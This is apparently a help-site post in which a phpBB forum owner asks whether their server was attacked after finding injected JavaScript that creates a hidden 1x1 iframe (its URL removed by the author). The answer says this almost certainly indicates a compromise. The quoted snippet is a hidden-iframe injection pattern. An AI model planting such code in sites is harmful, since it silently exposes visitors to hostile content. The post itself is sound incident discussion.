I logged into my server today and saw the following unrecognized code at the top of my directory browse window:
document.writeln("");var el = document.createElement("iframe");document.body.appendChild(el);el.id = 'myname';el.name = 'myname';el.style.width = "1px";el.style.height ="1px";el.scrolling="auto";el.frameBorder="0";el.src = "[edited by author, unknown URL was here]";
I do not recognize the URL (which I have edited out).
Additionally, my phpBB3 message board has a number of phpBB debug and PHP Notices at the top, which are all new to me. Furthermore, some of the links in the forum code seem to have been corrupted with garbage characters.
No additional content has been added or removed, but this is setting off a major concern with me.
Every single page on my site is protected by an Apache log-in prompt, which I thought was sufficient protection.
Have I been attacked, or am I jumping at shadows?
Answer
Unfortunately, an iframe loading content from a mystery URL is almost certainly indicative of a compromise.
A very thorough investigation by an expert would be needed to find the level of the breach, but a modification of the code like that would imply that the device is completely compromised. As to what to do next, have a read here.
No comments:
Post a Comment